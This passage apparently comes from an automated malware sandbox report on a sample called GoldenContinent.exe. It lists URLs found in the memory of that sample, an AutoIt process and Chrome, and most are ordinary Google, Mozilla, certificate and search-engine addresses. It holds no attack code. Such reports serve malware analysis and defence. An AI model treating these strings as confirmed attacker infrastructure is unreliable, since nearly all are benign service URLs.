                Source: GoldenContinent.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: GoldenContinent.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Relationship.com, 0000000A.00000000.1702695085.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp, Gnu.0.dr, Relationship.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 0000000F.00000003.2177663174.0000781002EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: chrome.exe, 0000000F.00000003.2218770227.0000781003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 0000000F.00000003.2218770227.0000781003338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: chrome.exe, 0000000F.00000003.2172623378.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2178761795.0000781002EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173217320.0000781002EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173175607.0000781003144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177639604.000078100254C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177663174.0000781002EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 0000000F.00000003.2156152328.0000632C002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2156137076.0000632C002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/C
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/F
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/M
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/P
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Q
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/T
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/W
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Z
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/a
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/d
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/e
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/h
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/k
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/n
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/r
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/u
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/y
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/x
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: EC2N7Y.10.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 0000000F.00000003.2203821564.0000781004F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 0000000F.00000003.2203821564.0000781004F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 0000000F.00000003.2203821564.0000781004F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardx
                Source: chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                Source: chrome.exe, 0000000F.00000003.2160492406.000073A0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2203632298.0000781002A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 0000000F.00000003.2195994383.0000781002E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
                Source: chrome.exe, 0000000F.00000003.2162033493.00007810023D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 0000000F.00000003.2162033493.00007810023D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/apix
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                Source: chrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
